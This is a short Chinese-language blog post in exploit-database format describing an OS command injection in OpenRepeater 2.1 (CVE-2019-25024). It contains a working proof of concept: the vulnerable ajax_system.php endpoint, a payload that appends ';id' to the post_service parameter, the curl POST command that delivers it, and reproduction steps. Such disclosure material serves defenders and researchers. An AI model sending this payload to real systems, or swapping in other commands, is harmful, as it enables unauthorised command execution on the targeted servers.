OpenRepeater 2.1 操作系统命令注入漏洞分析与利用

本文详细分析了OpenRepeater 2.1版本中存在的操作系统命令注入漏洞(CVE-2019-25024),提供了完整的漏洞概念验证(PoC)利用代码,阐述了利用此漏洞在目标系统上执行任意命令的方法。

Exploit标题: OpenRepeater 2.1 - 操作系统命令注入

日期: 2025-11-25

Exploit作者: CodeSecLab

供应商主页: https://github.com/OpenRepeater/openrepeater

软件链接: https://github.com/OpenRepeater/openrepeater

版本: 2.1

测试环境: Ubuntu

CVE编号: CVE-2019-25024

概念验证

用于OpenRepeater 2.2之前版本中操作系统命令注入的PoC

易受攻击端点的目标URL

TARGET_URL=“http://openrepeater/functions/ajax_system.php”

用于执行任意命令的有效载荷,例如演示漏洞的’id’命令

PAYLOAD=“post_service=;id”

使用curl发送有效载荷

curl -X POST -d “$PAYLOAD” “$TARGET_URL”

重现步骤:

  1. 发送POST请求。
  2. 观察结果,注入的命令(例如,uid=...)将出现在响应中。

标签:

命令注入

公告/来源:

链接

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次